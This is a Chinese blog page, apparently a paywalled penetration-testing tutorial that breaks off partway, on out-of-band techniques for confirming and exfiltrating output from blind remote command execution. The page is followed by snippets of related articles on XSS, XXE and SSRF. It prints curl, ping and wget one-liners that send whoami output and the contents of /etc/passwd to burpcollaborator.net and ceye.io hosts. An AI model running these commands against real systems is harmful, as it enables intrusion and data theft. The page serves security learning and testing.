网络安全最全带外攻击(OOB)RCE无回显思路总结详解_请求带外攻击(oob)域名

最新推荐文章于 2024-05-17 09:10:23 发布
最新推荐文章于 2024-05-17 09:10:23 发布
阅读量504 收藏 10
点赞数 5
分类专栏: 程序员 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79985178/article/details/138444245
版权
本文详细介绍了在网络安全中,如何应对命令执行无回显情况下的带外攻击(OOB)。讨论了通过DNS、HTTP和Windows系统的利用方法,包括利用curl和wget进行数据传输,并给出了利用DNS管道解析实现命令回显的技巧。
摘要由CSDN通过智能技术生成

好了,不卖关子了,我们接下来开讲

第一种命令格式

通过DNS记录查看是否执行(最好执行两次),ping走的是DNS协议

curl `whoami`.wyyysg1fi9svq8zgf0g11dz80z6pue.burpcollaborator.net

DNS,http中有回显

第二种命令格式

curl http://n7vp17a6r01mzz87orpsa48z9qfh36.burpcollaborator.net/`whoami`

DNS、记录中无回显,http中有回显

3.第三种命令执行格式

linux系统:

ping `whoami`.ip.port.ttq72fceob0yxwq9342c4yuo2f85wu.burpcollaborator.net

windows系统:

ping %whoami%.ip.port.ttq72fceob0yxwq9342c4yuo2f85wu.burpcollaborator.net

命令执行无回显

经常在拿下shell的时候碰到命令执行无回显的情况,因此为了解决命令执行无回显时,可以借助DNS管道解析来让命令回显

linux利用

1.http传输

wget传输

使用wget将命令回显信息通过包头数据字符串User-Agent传输至攻击服务器上,xargs echo-n代表去掉各个分隔符,换行符等符号输出

wget --header="User-Agent: $(cat /etc/passwd | xargs echo–n)" http://6rych16irk3064ztjoo9ufasuj0do2.burpcollaborator.net

curl传输

通过curl远程命令执行RCE去对靶机执行以下命令

#通过http记录查看是否执行(最好执行两次),curl走http协议
curl http://ip.port.XXXXXX.ceye.io/`whoami`
curl `whoami`.XXXXXX.ceye.io

如果回显信息不全,可以使用如下结合sed命令令回显完整,但其实也不是全的

最低0.47元/天 解锁文章
2301_79985178
关注
专栏目录
网络安全】XSS之Cookie外带攻击姿势及例题详析
等风来
05-19 7486
XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并将受害者的 Cookie 数据上传到攻击者控制的服务器上,然后攻击者就可以使用该 Cookie 来冒充受害者,执行一些恶意操作,例如盗取用户的账户信息、发起钓鱼攻击等。
什么是跨站脚本 (XSS) 攻击
简介
01-04 2095
这一次,教会xss攻击!!!!!!!
带外攻击(OOB)RCE回显思路总结详解
qq_71467825的博客
06-23 2478
向服务器提交一个payload,而服务器响应给我们相关的response信息,大家都叫他带内攻击,这些理论的东西,我们简单理解就好,这里我们就理解成。传输层协议使用带外数据(out-of-band,OOB)来发送一些重要的数据,如果通信一方有重要的数据需要通知对方时,协议能够将这些数据快速地发送到对方。为了发送这些数据,协议一般不使用与普通数据相同的通道,而是使用另外的通道。linux系统的套接字机制支持低层协议发送和接受带外数据。但是TCP协议没有真正意义上的带外数据
记一次紧急安全事件:请求带外攻击(OOB)域名
可乐要加冰!!!
09-01 1385
记一次紧急安全事件:请求带外攻击(OOB)域名
带外攻击
tomyyyyy
08-26 2145
带外攻击 基本概念 带内攻击 ​ 向服务器提交一个 payload,而服务器响应给我们相关的 response 信息。大家都叫它带内攻击,这些理论的东西,我们简单理解就好,这里我们就理解成单挑通信的通道为带内攻击,也就是整个测试过程或者说是交互过程,中间没有其外部的服务器参与,只有自己和目标服务器,那么就叫带内。 带外攻击(OOB) ​ 服务器用来测试盲的各种漏洞的话,则需要我们外部...
请求带外攻击(OOB)域名
完颜振江
02-20 1092
总之,OOB 域名是一种技术,通过将 DNS 查询发送到不同的网络上,以避免恶意actor 篡改DNS 数据,从而提高网络安全性。它的优点包括提高了网络安全性、降低了 DNS 攻击的风险和提高了网络可用性。然而,它也存在兼容性问题和性能差的缺点。Out-of-Band (OOB) 域名是一种技术,通过将域名系统(DNS) queries 发送到不同的网络上,以避免恶意actor 篡改DNS数据,从而提高网络安全性。
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
08-21 3476
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5669
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
Web安全-SSRF
lanyef的专栏
10-21 1841
0x01 简介 SSRF(Server-Side Request Forgery),服务端请求伪造。 攻击利用了可访问Web服务器(A)的特定功能构造恶意payload;攻击者在访问A时,利用A的特定功能构造特殊payload,由A发起对内部网络中系统B(内网隔离,外部不可访问)的请求,从而获取敏感信息。此时A被作为中间人(跳板)进行利用。 SSRF漏洞原因,主要是由于服务端提供了从其他服务...
XXE(XML External Entity attack)XML外部实体注入攻击
xiaoi123的博客
08-15 2215
导语   XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。   尽管XXE漏洞已经...
OOB带外攻击学习
蚁景网安学院
08-19 1741
前言之前看到fbctf的时候看到了这道题,但是一直没找到时间好好学习一下,这次某公司的比赛网络与信息安全领域专项赛——按F注入又碰到了一样的环境(真的就是一摸一样,可是最后卡在读文件一直...
rce(无回显
qq_62046696的博客
07-20 4615
RCE英文全称分为远程命令执行ping和远程代码执行evel。漏洞出现的原因没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。...
RCE篇之无回显rce
mingyqf的博客
01-13 1573
原文链接:http://arsenetang.com/2021/07/23/RCE%E7%AF%87%E4%B9%8B%E6%97%A0%E5%9B%9E%E6%98%BErce/
rce回显剖析
姜小孩的博客
12-12 5262
在ctf中,有时会遇到无回显rce,就是说虽然可以进行命令执行,但却看不到命令执行的结果,也不知道命令是否被执行,借着这次总结rce的机会,就把它一起总结
RCE绕过之无回显
Ciyaso的博客
07-23 3413
①shell_exec等无回显函数。 判断方法: ls;sleep(3) 利用: Ⅰ.复制,压缩,写shell等方法 copy flag.php flag.txt mv flag.php flag.txt cat flag.php > flag.txt Ⅱ.压缩方法 tar cvf flag.tar flag.php #tar压缩 tar zcvf flag.tar.gz flag.php #tar解压 zip flag.zip flag.php #zip压缩 unzip flag.
深入理解XXE漏洞。
snowlyzz的博客
08-22 915
xxe浅了解
渗透测试之突破口——web服务突破
m0_61506558的博客
10-17 593
任意用户注册可爆破用户名爆破用户名,密码用户名注入万能密码用户名Xss修改返回包信息,登入他人账户修改cookie中的参数,如user,adminid等HTML源码、JS等查看信息搜集一章后台登录参数修改为注册参数/reg、/register、/sign等密码重置1.重置一个账户,不发送验证码,设置验证码为空发送请求。2.发送验证码,查看相应包3.验证码生存期的爆破4.修改相应包为成功的相应包5.手工直接跳转到校验成功的界面。
RCE回显漏洞利用
qq_32947907的博客
01-22 1241
除了上面的一些常见的方式以外,还有其它的如ICMP协议外带等等。参考链接带外攻击OOBRCE回显思路总结)-腾讯云开发者社区-腾讯云不积跬步,无以至千里;不积小流,无以成江河。
浅析罗尔斯的无知之幕论文/浅析无回显的XXE(Blind XXE)_小白黑客详细教程
最新发布
2401_84915584的博客
05-17 435
xml介绍XML是一种非常流行的标记语言,在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议)来查询各种网络协议和服务(DNS,FTP,HTTP,SMB等)。
SQL注入漏洞(postgresql之OOB带外注入)
errorr0
07-13 1395
postgresql OOB带外
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值